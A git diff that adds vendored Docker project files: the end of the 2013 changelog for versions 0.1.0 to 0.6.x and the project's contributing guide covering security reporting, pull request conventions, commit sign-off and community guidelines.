+- Builder: Fix race condition in docker build with verbose output
+- Registry: Fix content-type for PushImageJSONIndex method
+* Contrib: Improve helper tools to generate debian and Arch linux server images
+
+## 0.6.4 (2013-10-16)
+
+#### Runtime
+
+- Add cleanup of container when Start() fails
+* Add better comments to utils/stdcopy.go
+* Add utils.Errorf for error logging
++ Add -rm to docker run for removing a container on exit
+- Remove error messages which are not actually errors
+- Fix `docker rm` with volumes
+- Fix some error cases where an HTTP body might not be closed
+- Fix panic with wrong dockercfg file
+- Fix the attach behavior with -i
+* Record termination time in state.
+- Use empty string so TempDir uses the OS's temp dir automatically
+- Make sure to close the network allocators
++ Autorestart containers by default
+* Bump vendor kr/pty to commit 3b1f6487b `(syscall.O_NOCTTY)`
+* lxc: Allow set_file_cap capability in container
+- Move run -rm to the cli only
+* Split stdout stderr
+* Always create a new session for the container
+
+#### Testing
+
+- Add aggregated docker-ci email report
+- Add cleanup to remove leftover containers
+* Add nightly release to docker-ci
+* Add more tests around auth.ResolveAuthConfig
+- Remove a few errors in tests
+- Catch errClosing error when TCP and UDP proxies are terminated
+* Only run certain tests with TESTFLAGS='-run TestName' make.sh
+* Prevent docker-ci to test closing PRs
+* Replace panic by log.Fatal in tests
+- Increase TestRunDetach timeout
+
+#### Documentation
+
+* Add initial draft of the Docker infrastructure doc
+* Add devenvironment link to CONTRIBUTING.md
+* Add `apt-get install curl` to Ubuntu docs
+* Add explanation for export restrictions
+* Add .dockercfg doc
+* Remove Gentoo install notes about #1422 workaround
+* Fix help text for -v option
+* Fix Ping endpoint documentation
+- Fix parameter names in docs for ADD command
+- Fix ironic typo in changelog
+* Various command fixes in postgres example
+* Document how to edit and release docs
+- Minor updates to `postgresql_service.rst`
+* Clarify LGTM process to contributors
+- Corrected error in the package name
+* Document what `vagrant up` is actually doing
++ improve doc search results
+* Cleanup whitespace in API 1.5 docs
+* use angle brackets in MAINTAINER example email
+* Update archlinux.rst
++ Changes to a new style for the docs. Includes version switcher.
+* Formatting, add information about multiline json
+* Improve registry and index REST API documentation
+- Replace deprecated upgrading reference to docker-latest.tgz, which hasn't been updated since 0.5.3
+* Update Gentoo installation documentation now that we're in the portage tree proper
+* Cleanup and reorganize docs and tooling for contributors and maintainers
+- Minor spelling correction of protocoll -> protocol
+
+#### Contrib
+
+* Add vim syntax highlighting for Dockerfiles from @honza
+* Add mkimage-arch.sh
+* Reorganize contributed completion scripts to add zsh completion
+
+#### Hack
+
+* Add vagrant user to the docker group
+* Add proper bash completion for "docker push"
+* Add xz utils as a runtime dep
+* Add cleanup/refactor portion of #2010 for hack and Dockerfile updates
++ Add contrib/mkimage-centos.sh back (from #1621), and associated documentation link
+* Add several of the small make.sh fixes from #1920, and make the output more consistent and contributor-friendly
++ Add @tianon to hack/MAINTAINERS
+* Improve network performance for VirtualBox
+* Revamp install.sh to be usable by more people, and to use official install methods whenever possible (apt repo, portage tree, etc.)
+- Fix contrib/mkimage-debian.sh apt caching prevention
++ Add Dockerfile.tmLanguage to contrib
+* Configured FPM to make /etc/init/docker.conf a config file
+* Enable SSH Agent forwarding in Vagrant VM
+* Several small tweaks/fixes for contrib/mkimage-debian.sh
+
+#### Other
+
+- Builder: Abort build if mergeConfig returns an error and fix duplicate error message
+- Packaging: Remove deprecated packaging directory
+- Registry: Use correct auth config when logging in.
+- Registry: Fix the error message so it is the same as the regex
+
+## 0.6.3 (2013-09-23)
+
+#### Packaging
+
+* Add 'docker' group on install for ubuntu package
+* Update tar vendor dependency
+* Download apt key over HTTPS
+
+#### Runtime
+
+- Only copy and change permissions on non-bindmount volumes
+* Allow multiple volumes-from
+- Fix HTTP imports from STDIN
+
+#### Documentation
+
+* Update section on extracting the docker binary after build
+* Update development environment docs for new build process
+* Remove 'base' image from documentation
+
+#### Other
+
+- Client: Fix detach issue
+- Registry: Update regular expression to match index
+
+## 0.6.2 (2013-09-17)
+
+#### Runtime
+
++ Add domainname support
++ Implement image filtering with path.Match
+* Remove unnecessary warnings
+* Remove os/user dependency
+* Only mount the hostname file when the config exists
+* Handle signals within the `docker login` command
+- UID and GID are now also applied to volumes
+- `docker start` set error code upon error
+- `docker run` set the same error code as the process started
+
+#### Builder
+
++ Add -rm option in order to remove intermediate containers
+* Allow multiline for the RUN instruction
+
+#### Registry
+
+* Implement login with private registry
+- Fix push issues
+
+#### Other
+
++ Hack: Vendor all dependencies
+* Remote API: Bump to v1.5
+* Packaging: Break down hack/make.sh into small scripts, one per 'bundle': test, binary, ubuntu etc.
+* Documentation: General improvements
+
+## 0.6.1 (2013-08-23)
+
+#### Registry
+
+* Pass "meta" headers in API calls to the registry
+
+#### Packaging
+
+- Use correct upstart script with new build tool
+- Use libffi-dev, don`t build it from sources
+- Remove duplicate mercurial install command
+
+## 0.6.0 (2013-08-22)
+
+#### Runtime
+
++ Add lxc-conf flag to allow custom lxc options
++ Add an option to set the working directory
+* Add Image name to LogEvent tests
++ Add -privileged flag and relevant tests, docs, and examples
+* Add websocket support to /container/<name>/attach/ws
+* Add warning when net.ipv4.ip_forwarding = 0
+* Add hostname to environment
+* Add last stable version in `docker version`
+- Fix race conditions in parallel pull
+- Fix Graph ByParent() to generate list of child images per parent image.
+- Fix typo: fmt.Sprint -> fmt.Sprintf
+- Fix small \n error un docker build
+* Fix to "Inject dockerinit at /.dockerinit"
+* Fix #910. print user name to docker info output
+* Use Go 1.1.2 for dockerbuilder
+* Use ranged for loop on channels
+- Use utils.ParseRepositoryTag instead of strings.Split(name, ":") in server.ImageDelete
+- Improve CMD, ENTRYPOINT, and attach docs.
+- Improve connect message with socket error
+- Load authConfig only when needed and fix useless WARNING
+- Show tag used when image is missing
+* Apply volumes-from before creating volumes
+- Make docker run handle SIGINT/SIGTERM
+- Prevent crash when .dockercfg not readable
+- Install script should be fetched over https, not http.
+* API, issue 1471: Use groups for socket permissions
+- Correctly detect IPv4 forwarding
+* Mount /dev/shm as a tmpfs
+- Switch from http to https for get.docker.io
+* Let userland proxy handle container-bound traffic
+* Update the Docker CLI to specify a value for the "Host" header.
+- Change network range to avoid conflict with EC2 DNS
+- Reduce connect and read timeout when pinging the registry
+* Parallel pull
+- Handle ip route showing mask-less IP addresses
+* Allow ENTRYPOINT without CMD
+- Always consider localhost as a domain name when parsing the FQN repos name
+* Refactor checksum
+
+#### Documentation
+
+* Add MongoDB image example
+* Add instructions for creating and using the docker group
+* Add sudo to examples and installation to documentation
+* Add ufw doc
+* Add a reference to ps -a
+* Add information about Docker`s high level tools over LXC.
+* Fix typo in docs for docker run -dns
+* Fix a typo in the ubuntu installation guide
+* Fix to docs regarding adding docker groups
+* Update default -H docs
+* Update readme with dependencies for building
+* Update amazon.rst to explain that Vagrant is not necessary for running Docker on ec2
+* PostgreSQL service example in documentation
+* Suggest installing linux-headers by default.
+* Change the twitter handle
+* Clarify Amazon EC2 installation
+* 'Base' image is deprecated and should no longer be referenced in the docs.
+* Move note about officially supported kernel
+- Solved the logo being squished in Safari
+
+#### Builder
+
++ Add USER instruction do Dockerfile
++ Add workdir support for the Buildfile
+* Add no cache for docker build
+- Fix docker build and docker events output
+- Only count known instructions as build steps
+- Make sure ENV instruction within build perform a commit each time
+- Forbid certain paths within docker build ADD
+- Repository name (and optionally a tag) in build usage
+- Make sure ADD will create everything in 0755
+
+#### Remote API
+
+* Sort Images by most recent creation date.
+* Reworking opaque requests in registry module
+* Add image name in /events
+* Use mime pkg to parse Content-Type
+* 650 http utils and user agent field
+
+#### Hack
+
++ Bash Completion: Limit commands to containers of a relevant state
+* Add docker dependencies coverage testing into docker-ci
+
+#### Packaging
+
++ Docker-brew 0.5.2 support and memory footprint reduction
+* Add new docker dependencies into docker-ci
+- Revert "docker.upstart: avoid spawning a `sh` process"
++ Docker-brew and Docker standard library
++ Release docker with docker
+* Fix the upstart script generated by get.docker.io
+* Enabled the docs to generate manpages.
+* Revert Bind daemon to 0.0.0.0 in Vagrant.
+
+#### Register
+
+* Improve auth push
+* Registry unit tests + mock registry
+
+#### Tests
+
+* Improve TestKillDifferentUser to prevent timeout on buildbot
+- Fix typo in TestBindMounts (runContainer called without image)
+* Improve TestGetContainersTop so it does not rely on sleep
+* Relax the lo interface test to allow iface index != 1
+* Add registry functional test to docker-ci
+* Add some tests in server and utils
+
+#### Other
+
+* Contrib: bash completion script
+* Client: Add docker cp command and copy api endpoint to copy container files/folders to the host
+* Don`t read from stdout when only attached to stdin
+
+## 0.5.3 (2013-08-13)
+
+#### Runtime
+
+* Use docker group for socket permissions
+- Spawn shell within upstart script
+- Handle ip route showing mask-less IP addresses
+- Add hostname to environment
+
+#### Builder
+
+- Make sure ENV instruction within build perform a commit each time
+
+## 0.5.2 (2013-08-08)
+
+* Builder: Forbid certain paths within docker build ADD
+- Runtime: Change network range to avoid conflict with EC2 DNS
+* API: Change daemon to listen on unix socket by default
+
+## 0.5.1 (2013-07-30)
+
+#### Runtime
+
++ Add `ps` args to `docker top`
++ Add support for container ID files (pidfile like)
++ Add container=lxc in default env
++ Support networkless containers with `docker run -n` and `docker -d -b=none`
+* Stdout/stderr logs are now stored in the same file as JSON
+* Allocate a /16 IP range by default, with fallback to /24. Try 12 ranges instead of 3.
+* Change .dockercfg format to json and support multiple auth remote
+- Do not override volumes from config
+- Fix issue with EXPOSE override
+
+#### API
+
++ Docker client now sets useragent (RFC 2616)
++ Add /events endpoint
+
+#### Builder
+
++ ADD command now understands URLs
++ CmdAdd and CmdEnv now respect Dockerfile-set ENV variables
+- Create directories with 755 instead of 700 within ADD instruction
+
+#### Hack
+
+* Simplify unit tests with helpers
+* Improve docker.upstart event
+* Add coverage testing into docker-ci
+
+## 0.5.0 (2013-07-17)
+
+#### Runtime
+
++ List all processes running inside a container with 'docker top'
++ Host directories can be mounted as volumes with 'docker run -v'
++ Containers can expose public UDP ports (eg, '-p 123/udp')
++ Optionally specify an exact public port (eg. '-p 80:4500')
+* 'docker login' supports additional options
+- Don't save a container`s hostname when committing an image.
+
+#### Registry
+
++ New image naming scheme inspired by Go packaging convention allows arbitrary combinations of registries
+- Fix issues when uploading images to a private registry
+
+#### Builder
+
++ ENTRYPOINT instruction sets a default binary entry point to a container
++ VOLUME instruction marks a part of the container as persistent data
+* 'docker build' displays the full output of a build by default
+
+## 0.4.8 (2013-07-01)
+
++ Builder: New build operation ENTRYPOINT adds an executable entry point to the container.  - Runtime: Fix a bug which caused 'docker run -d' to no longer print the container ID.
+- Tests: Fix issues in the test suite
+
+## 0.4.7 (2013-06-28)
+
+#### Remote API
+
+* The progress bar updates faster when downloading and uploading large files
+- Fix a bug in the optional unix socket transport
+
+#### Runtime
+
+* Improve detection of kernel version
++ Host directories can be mounted as volumes with 'docker run -b'
+- fix an issue when only attaching to stdin
+* Use 'tar --numeric-owner' to avoid uid mismatch across multiple hosts
+
+#### Hack
+
+* Improve test suite and dev environment
+* Remove dependency on unit tests on 'os/user'
+
+#### Other
+
+* Registry: easier push/pull to a custom registry
++ Documentation: add terminology section
+
+## 0.4.6 (2013-06-22)
+
+- Runtime: fix a bug which caused creation of empty images (and volumes) to crash.
+
+## 0.4.5 (2013-06-21)
+
++ Builder: 'docker build git://URL' fetches and builds a remote git repository
+* Runtime: 'docker ps -s' optionally prints container size
+* Tests: improved and simplified
+- Runtime: fix a regression introduced in 0.4.3 which caused the logs command to fail.
+- Builder: fix a regression when using ADD with single regular file.
+
+## 0.4.4 (2013-06-19)
+
+- Builder: fix a regression introduced in 0.4.3 which caused builds to fail on new clients.
+
+## 0.4.3 (2013-06-19)
+
+#### Builder
+
++ ADD of a local file will detect tar archives and unpack them
+* ADD improvements: use tar for copy + automatically unpack local archives
+* ADD uses tar/untar for copies instead of calling 'cp -ar'
+* Fix the behavior of ADD to be (mostly) reverse-compatible, predictable and well-documented.
+- Fix a bug which caused builds to fail if ADD was the first command
+* Nicer output for 'docker build'
+
+#### Runtime
+
+* Remove bsdtar dependency
+* Add unix socket and multiple -H support
+* Prevent rm of running containers
+* Use go1.1 cookiejar
+- Fix issue detaching from running TTY container
+- Forbid parallel push/pull for a single image/repo. Fixes #311
+- Fix race condition within Run command when attaching.
+
+#### Client
+
+* HumanReadable ProgressBar sizes in pull
+* Fix docker version`s git commit output
+
+#### API
+
+* Send all tags on History API call
+* Add tag lookup to history command. Fixes #882
+
+#### Documentation
+
+- Fix missing command in irc bouncer example
+
+## 0.4.2 (2013-06-17)
+
+- Packaging: Bumped version to work around an Ubuntu bug
+
+## 0.4.1 (2013-06-17)
+
+#### Remote Api
+
++ Add flag to enable cross domain requests
++ Add images and containers sizes in docker ps and docker images
+
+#### Runtime
+
++ Configure dns configuration host-wide with 'docker -d -dns'
++ Detect faulty DNS configuration and replace it with a public default
++ Allow docker run <name>:<id>
++ You can now specify public port (ex: -p 80:4500)
+* Improve image removal to garbage-collect unreferenced parents
+
+#### Client
+
+* Allow multiple params in inspect
+* Print the container id before the hijack in `docker run`
+
+#### Registry
+
+* Add regexp check on repo`s name
+* Move auth to the client
+- Remove login check on pull
+
+#### Other
+
+* Vagrantfile: Add the rest api port to vagrantfile`s port_forward
+* Upgrade to Go 1.1
+- Builder: don`t ignore last line in Dockerfile when it doesn`t end with \n
+
+## 0.4.0 (2013-06-03)
+
+#### Builder
+
++ Introducing Builder
++ 'docker build' builds a container, layer by layer, from a source repository containing a Dockerfile
+
+#### Remote API
+
++ Introducing Remote API
++ control Docker programmatically using a simple HTTP/json API
+
+#### Runtime
+
+* Various reliability and usability improvements
+
+## 0.3.4 (2013-05-30)
+
+#### Builder
+
++ 'docker build' builds a container, layer by layer, from a source repository containing a Dockerfile
++ 'docker build -t FOO' applies the tag FOO to the newly built container.
+
+#### Runtime
+
++ Interactive TTYs correctly handle window resize
+* Fix how configuration is merged between layers
+
+#### Remote API
+
++ Split stdout and stderr on 'docker run'
++ Optionally listen on a different IP and port (use at your own risk)
+
+#### Documentation
+
+* Improve install instructions.
+
+## 0.3.3 (2013-05-23)
+
+- Registry: Fix push regression
+- Various bugfixes
+
+## 0.3.2 (2013-05-09)
+
+#### Registry
+
+* Improve the checksum process
+* Use the size to have a good progress bar while pushing
+* Use the actual archive if it exists in order to speed up the push
+- Fix error 400 on push
+
+#### Runtime
+
+* Store the actual archive on commit
+
+## 0.3.1 (2013-05-08)
+
+#### Builder
+
++ Implement the autorun capability within docker builder
++ Add caching to docker builder
++ Add support for docker builder with native API as top level command
++ Implement ENV within docker builder
+- Check the command existence prior create and add Unit tests for the case
+* use any whitespaces instead of tabs
+
+#### Runtime
+
++ Add go version to debug infos
+* Kernel version - don`t show the dash if flavor is empty
+
+#### Registry
+
++ Add docker search top level command in order to search a repository
+- Fix pull for official images with specific tag
+- Fix issue when login in with a different user and trying to push
+* Improve checksum - async calculation
+
+#### Images
+
++ Output graph of images to dot (graphviz)
+- Fix ByParent function
+
+#### Documentation
+
++ New introduction and high-level overview
++ Add the documentation for docker builder
+- CSS fix for docker documentation to make REST API docs look better.
+- Fix CouchDB example page header mistake
+- Fix README formatting
+* Update www.docker.io website.
+
+#### Other
+
++ Website: new high-level overview
+- Makefile: Swap "go get" for "go get -d", especially to compile on go1.1rc
+* Packaging: packaging ubuntu; issue #510: Use goland-stable PPA package to build docker
+
+## 0.3.0 (2013-05-06)
+
+#### Runtime
+
+- Fix the command existence check
+- strings.Split may return an empty string on no match
+- Fix an index out of range crash if cgroup memory is not
+
+#### Documentation
+
+* Various improvements
++ New example: sharing data between 2 couchdb databases
+
+#### Other
+
+* Vagrant: Use only one deb line in /etc/apt
++ Registry: Implement the new registry
+
+## 0.2.2 (2013-05-03)
+
++ Support for data volumes ('docker run -v=PATH')
++ Share data volumes between containers ('docker run -volumes-from')
++ Improve documentation
+* Upgrade to Go 1.0.3
+* Various upgrades to the dev environment for contributors
+
+## 0.2.1 (2013-05-01)
+
++ 'docker commit -run' bundles a layer with default runtime options: command, ports etc.
+* Improve install process on Vagrant
++ New Dockerfile operation: "maintainer"
++ New Dockerfile operation: "expose"
++ New Dockerfile operation: "cmd"
++ Contrib script to build a Debian base layer
++ 'docker -d -r': restart crashed containers at daemon startup
+* Runtime: improve test coverage
+
+## 0.2.0 (2013-04-23)
+
+- Runtime: ghost containers can be killed and waited for
+* Documentation: update install instructions
+- Packaging: fix Vagrantfile
+- Development: automate releasing binaries and ubuntu packages
++ Add a changelog
+- Various bugfixes
+
+## 0.1.8 (2013-04-22)
+
+- Dynamically detect cgroup capabilities
+- Issue stability warning on kernels <3.8
+- 'docker push' buffers on disk instead of memory
+- Fix 'docker diff' for removed files
+- Fix 'docker stop' for ghost containers
+- Fix handling of pidfile
+- Various bugfixes and stability improvements
+
+## 0.1.7 (2013-04-18)
+
+- Container ports are available on localhost
+- 'docker ps' shows allocated TCP ports
+- Contributors can run 'make hack' to start a continuous integration VM
+- Streamline ubuntu packaging & uploading
+- Various bugfixes and stability improvements
+
+## 0.1.6 (2013-04-17)
+
+- Record the author an image with 'docker commit -author'
+
+## 0.1.5 (2013-04-17)
+
+- Disable standalone mode
+- Use a custom DNS resolver with 'docker -d -dns'
+- Detect ghost containers
+- Improve diagnosis of missing system capabilities
+- Allow disabling memory limits at compile time
+- Add debian packaging
+- Documentation: installing on Arch Linux
+- Documentation: running Redis on docker
+- Fix lxc 0.9 compatibility
+- Automatically load aufs module
+- Various bugfixes and stability improvements
+
+## 0.1.4 (2013-04-09)
+
+- Full support for TTY emulation
+- Detach from a TTY session with the escape sequence `C-p C-q`
+- Various bugfixes and stability improvements
+- Minor UI improvements
+- Automatically create our own bridge interface 'docker0'
+
+## 0.1.3 (2013-04-04)
+
+- Choose TCP frontend port with '-p :PORT'
+- Layer format is versioned
+- Major reliability improvements to the process manager
+- Various bugfixes and stability improvements
+
+## 0.1.2 (2013-04-03)
+
+- Set container hostname with 'docker run -h'
+- Selective attach at run with 'docker run -a [stdin[,stdout[,stderr]]]'
+- Various bugfixes and stability improvements
+- UI polish
+- Progress bar on push/pull
+- Use XZ compression by default
+- Make IP allocator lazy
+
+## 0.1.1 (2013-03-31)
+
+- Display shorthand IDs for convenience
+- Stabilize process management
+- Layers can include a commit message
+- Simplified 'docker attach'
+- Fix support for re-attaching
+- Various bugfixes and stability improvements
+- Auto-download at run
+- Auto-login on push
+- Beefed up documentation
+
+## 0.1.0 (2013-03-23)
+
+Initial public release
+
+- Implement registry in order to push/pull images
+- TCP port allocation
+- Fix termcaps on Linux
+- Add documentation
+- Add Vagrant support with Vagrantfile
+- Add unit tests
+- Add repository/tags to ease image management
+- Improve the layer implementation
diff --git a/vendor/github.com/docker/docker/CONTRIBUTING.md b/vendor/github.com/docker/docker/CONTRIBUTING.md
new file mode 100644
index 0000000000..eb5f8ab0e9
--- /dev/null
+++ b/vendor/github.com/docker/docker/CONTRIBUTING.md
@@ -0,0 +1,401 @@
+# Contributing to Docker
+
+Want to hack on Docker? Awesome!  We have a contributor's guide that explains
+[setting up a Docker development environment and the contribution
+process](https://docs.docker.com/opensource/project/who-written-for/). 
+
+[![Contributors guide](docs/static_files/contributors.png)](https://docs.docker.com/opensource/project/who-written-for/)
+
+This page contains information about reporting issues as well as some tips and
+guidelines useful to experienced open source contributors. Finally, make sure
+you read our [community guidelines](#docker-community-guidelines) before you
+start participating.
+
+## Topics
+
+* [Reporting Security Issues](#reporting-security-issues)
+* [Design and Cleanup Proposals](#design-and-cleanup-proposals)
+* [Reporting Issues](#reporting-other-issues)
+* [Quick Contribution Tips and Guidelines](#quick-contribution-tips-and-guidelines)
+* [Community Guidelines](#docker-community-guidelines)
+
+## Reporting security issues
+
+The Docker maintainers take security seriously. If you discover a security
+issue, please bring it to their attention right away!
+
+Please **DO NOT** file a public issue, instead send your report privately to
+[security@docker.com](mailto:security@docker.com).
+
+Security reports are greatly appreciated and we will publicly thank you for it.
+We also like to send gifts&mdash;if you're into Docker schwag, make sure to let
+us know. We currently do not offer a paid security bounty program, but are not
+ruling it out in the future.
+
+
+## Reporting other issues
+
+A great way to contribute to the project is to send a detailed report when you
+encounter an issue. We always appreciate a well-written, thorough bug report,
+and will thank you for it!
+
+Check that [our issue database](https://github.com/docker/docker/issues)
+doesn't already include that problem or suggestion before submitting an issue.
+If you find a match, you can use the "subscribe" button to get notified on
+updates. Do *not* leave random "+1" or "I have this too" comments, as they
+only clutter the discussion, and don't help resolving it. However, if you
+have ways to reproduce the issue or have additional information that may help
+resolving the issue, please leave a comment.
+
+When reporting issues, always include:
+
+* The output of `docker version`.
+* The output of `docker info`.
+
+Also include the steps required to reproduce the problem if possible and
+applicable. This information will help us review and fix your issue faster.
+When sending lengthy log-files, consider posting them as a gist (https://gist.github.com).
+Don't forget to remove sensitive data from your logfiles before posting (you can
+replace those parts with "REDACTED").
+
+## Quick contribution tips and guidelines
+
+This section gives the experienced contributor some tips and guidelines.
+
+### Pull requests are always welcome
+
+Not sure if that typo is worth a pull request? Found a bug and know how to fix
+it? Do it! We will appreciate it. Any significant improvement should be
+documented as [a GitHub issue](https://github.com/docker/docker/issues) before
+anybody starts working on it.
+
+We are always thrilled to receive pull requests. We do our best to process them
+quickly. If your pull request is not accepted on the first try,
+don't get discouraged! Our contributor's guide explains [the review process we
+use for simple changes](https://docs.docker.com/opensource/workflow/make-a-contribution/).
+
+### Design and cleanup proposals
+
+You can propose new designs for existing Docker features. You can also design
+entirely new features. We really appreciate contributors who want to refactor or
+otherwise cleanup our project. For information on making these types of
+contributions, see [the advanced contribution
+section](https://docs.docker.com/opensource/workflow/advanced-contributing/) in
+the contributors guide.
+
+We try hard to keep Docker lean and focused. Docker can't do everything for
+everybody. This means that we might decide against incorporating a new feature.
+However, there might be a way to implement that feature *on top of* Docker.
+
+### Talking to other Docker users and contributors
+
+<table class="tg">
+  <col width="45%">
+  <col width="65%">
+  <tr>
+    <td>Forums</td>
+    <td>
+      A public forum for users to discuss questions and explore current design patterns and
+      best practices about Docker and related projects in the Docker Ecosystem. To participate,
+      just log in with your Docker Hub account on <a href="https://forums.docker.com" target="_blank">https://forums.docker.com</a>.
+    </td>
+  </tr>
+  <tr>
+    <td>Internet&nbsp;Relay&nbsp;Chat&nbsp;(IRC)</td>
+    <td>
+      <p>
+        IRC a direct line to our most knowledgeable Docker users; we have
+        both the  <code>#docker</code> and <code>#docker-dev</code> group on
+        <strong>irc.freenode.net</strong>.
+        IRC is a rich chat protocol but it can overwhelm new users. You can search
+        <a href="https://botbot.me/freenode/docker/#" target="_blank">our chat archives</a>.
+      </p>
+      <p>
+        Read our <a href="https://docs.docker.com/opensource/get-help/#irc-quickstart" target="_blank">IRC quickstart guide</a>
+        for an easy way to get started.
+      </p>
+    </td>
+  </tr>
+  <tr>
+    <td>Google Group</td>
+    <td>
+      The <a href="https://groups.google.com/forum/#!forum/docker-dev" target="_blank">docker-dev</a>
+      group is for contributors and other people contributing to the Docker project.
+      You can join them without a google account by sending an email to 
+      <a href="mailto:docker-dev+subscribe@googlegroups.com">docker-dev+subscribe@googlegroups.com</a>.
+      After receiving the join-request message, you can simply reply to that to confirm the subscription.
+    </td>
+  </tr>
+  <tr>
+    <td>Twitter</td>
+    <td>
+      You can follow <a href="https://twitter.com/docker/" target="_blank">Docker's Twitter feed</a>
+      to get updates on our products. You can also tweet us questions or just
+      share blogs or stories.
+    </td>
+  </tr>
+  <tr>
+    <td>Stack Overflow</td>
+    <td>
+      Stack Overflow has over 17000 Docker questions listed. We regularly
+      monitor <a href="https://stackoverflow.com/search?tab=newest&q=docker" target="_blank">Docker questions</a>
+      and so do many other knowledgeable Docker users.
+    </td>
+  </tr>
+</table>
+
+
+### Conventions
+
+Fork the repository and make changes on your fork in a feature branch:
+
+- If it's a bug fix branch, name it XXXX-something where XXXX is the number of
+	the issue. 
+- If it's a feature branch, create an enhancement issue to announce
+	your intentions, and name it XXXX-something where XXXX is the number of the
+	issue.
+
+Submit unit tests for your changes. Go has a great test framework built in; use
+it! Take a look at existing tests for inspiration. [Run the full test
+suite](https://docs.docker.com/opensource/project/test-and-docs/) on your branch before
+submitting a pull request.
+
+Update the documentation when creating or modifying features. Test your
+documentation changes for clarity, concision, and correctness, as well as a
+clean documentation build. See our contributors guide for [our style
+guide](https://docs.docker.com/opensource/doc-style) and instructions on [building
+the documentation](https://docs.docker.com/opensource/project/test-and-docs/#build-and-test-the-documentation).
+
+Write clean code. Universally formatted code promotes ease of writing, reading,
+and maintenance. Always run `gofmt -s -w file.go` on each changed file before
+committing your changes. Most editors have plug-ins that do this automatically.
+
+Pull request descriptions should be as clear as possible and include a reference
+to all the issues that they address.
+
+Commit messages must start with a capitalized and short summary (max. 50 chars)
+written in the imperative, followed by an optional, more detailed explanatory
+text which is separated from the summary by an empty line.
+
+Code review comments may be added to your pull request. Discuss, then make the
+suggested modifications and push additional commits to your feature branch. Post
+a comment after pushing. New commits show up in the pull request automatically,
+but the reviewers are notified only when you comment.
+
+Pull requests must be cleanly rebased on top of master without multiple branches
+mixed into the PR.
+
+**Git tip**: If your PR no longer merges cleanly, use `rebase master` in your
+feature branch to update your pull request rather than `merge master`.
+
+Before you make a pull request, squash your commits into logical units of work
+using `git rebase -i` and `git push -f`. A logical unit of work is a consistent
+set of patches that should be reviewed together: for example, upgrading the
+version of a vendored dependency and taking advantage of its now available new
+feature constitute two separate units of work. Implementing a new function and
+calling it in another file constitute a single logical unit of work. The very
+high majority of submissions should have a single commit, so if in doubt: squash
+down to one.
+
+After every commit, [make sure the test suite passes]
+(https://docs.docker.com/opensource/project/test-and-docs/). Include documentation
+changes in the same pull request so that a revert would remove all traces of
+the feature or fix.
+
+Include an issue reference like `Closes #XXXX` or `Fixes #XXXX` in commits that
+close an issue. Including references automatically closes the issue on a merge.
+
+Please do not add yourself to the `AUTHORS` file, as it is regenerated regularly
+from the Git history.
+
+Please see the [Coding Style](#coding-style) for further guidelines.
+
+### Merge approval
+
+Docker maintainers use LGTM (Looks Good To Me) in comments on the code review to
+indicate acceptance.
+
+A change requires LGTMs from an absolute majority of the maintainers of each
+component affected. For example, if a change affects `docs/` and `registry/`, it
+needs an absolute majority from the maintainers of `docs/` AND, separately, an
+absolute majority of the maintainers of `registry/`.
+
+For more details, see the [MAINTAINERS](MAINTAINERS) page.
+
+### Sign your work
+
+The sign-off is a simple line at the end of the explanation for the patch. Your
+signature certifies that you wrote the patch or otherwise have the right to pass
+it on as an open-source patch. The rules are pretty simple: if you can certify
+the below (from [developercertificate.org](http://developercertificate.org/)):
+
+```
+Developer Certificate of Origin
+Version 1.1
+
+Copyright (C) 2004, 2006 The Linux Foundation and its contributors.
+1 Letterman Drive
+Suite D4700
+San Francisco, CA, 94129
+
+Everyone is permitted to copy and distribute verbatim copies of this
+license document, but changing it is not allowed.
+
+Developer's Certificate of Origin 1.1
+
+By making a contribution to this project, I certify that:
+
+(a) The contribution was created in whole or in part by me and I
+    have the right to submit it under the open source license
+    indicated in the file; or
+
+(b) The contribution is based upon previous work that, to the best
+    of my knowledge, is covered under an appropriate open source
+    license and I have the right under that license to submit that
+    work with modifications, whether created in whole or in part
+    by me, under the same open source license (unless I am
+    permitted to submit under a different license), as indicated
+    in the file; or
+
+(c) The contribution was provided directly to me by some other
+    person who certified (a), (b) or (c) and I have not modified
+    it.
+
+(d) I understand and agree that this project and the contribution
+    are public and that a record of the contribution (including all
+    personal information I submit with it, including my sign-off) is
+    maintained indefinitely and may be redistributed consistent with
+    this project or the open source license(s) involved.
+```
+
+Then you just add a line to every git commit message:
+
+    Signed-off-by: Joe Smith <joe.smith@email.com>
+
+Use your real name (sorry, no pseudonyms or anonymous contributions.)
+
+If you set your `user.name` and `user.email` git configs, you can sign your
+commit automatically with `git commit -s`.
+
+### How can I become a maintainer?
+
+The procedures for adding new maintainers are explained in the 
+global [MAINTAINERS](https://github.com/docker/opensource/blob/master/MAINTAINERS)
+file in the [https://github.com/docker/opensource/](https://github.com/docker/opensource/)
+repository.
+
+Don't forget: being a maintainer is a time investment. Make sure you
+will have time to make yourself available. You don't have to be a
+maintainer to make a difference on the project!
+
+## Docker community guidelines
+
+We want to keep the Docker community awesome, growing and collaborative. We need
+your help to keep it that way. To help with this we've come up with some general
+guidelines for the community as a whole:
+
+* Be nice: Be courteous, respectful and polite to fellow community members:
+  no regional, racial, gender, or other abuse will be tolerated. We like
+  nice people way better than mean ones!
+
+* Encourage diversity and participation: Make everyone in our community feel
+  welcome, regardless of their background and the extent of their
+  contributions, and do everything possible to encourage participation in
+  our community.
+
+* Keep it legal: Basically, don't get us in trouble. Share only content that
+  you own, do not share private or sensitive information, and don't break
+  the law.
+
+* Stay on topic: Make sure that you are posting to the correct channel and
+  avoid off-topic discussions. Remember when you update an issue or respond
+  to an email you are potentially sending to a large number of people. Please
+  consider this before you update. Also remember that nobody likes spam.
+
+* Don't send email to the maintainers: There's no need to send email to the
+  maintainers to ask them to investigate an issue or to take a look at a
+  pull request. Instead of sending an email, GitHub mentions should be
+  used to ping maintainers to review a pull request, a proposal or an
+  issue.
+
+### Guideline violations — 3 strikes method
+
+The point of this section is not to find opportunities to punish people, but we
+do need a fair way to deal with people who are making our community suck.
+
+1. First occurrence: We'll give you a friendly, but public reminder that the
+   behavior is inappropriate according to our guidelines.
+
+2. Second occurrence: We will send you a private message with a warning that
+   any additional violations will result in removal from the community.
+
+3. Third occurrence: Depending on the violation, we may need to delete or ban
+   your account.
+
+**Notes:**
+
+* Obvious spammers are banned on first occurrence. If we don't do this, we'll
+  have spam all over the place.
+
+* Violations are forgiven after 6 months of good behavior, and we won't hold a
+  grudge.
+
+* People who commit minor infractions will get some education, rather than
+  hammering them in the 3 strikes process.
+
+* The rules apply equally to everyone in the community, no matter how much
+	you've contributed.
+
+* Extreme violations of a threatening, abusive, destructive or illegal nature
+	will be addressed immediately and are not subject to 3 strikes or forgiveness.
+
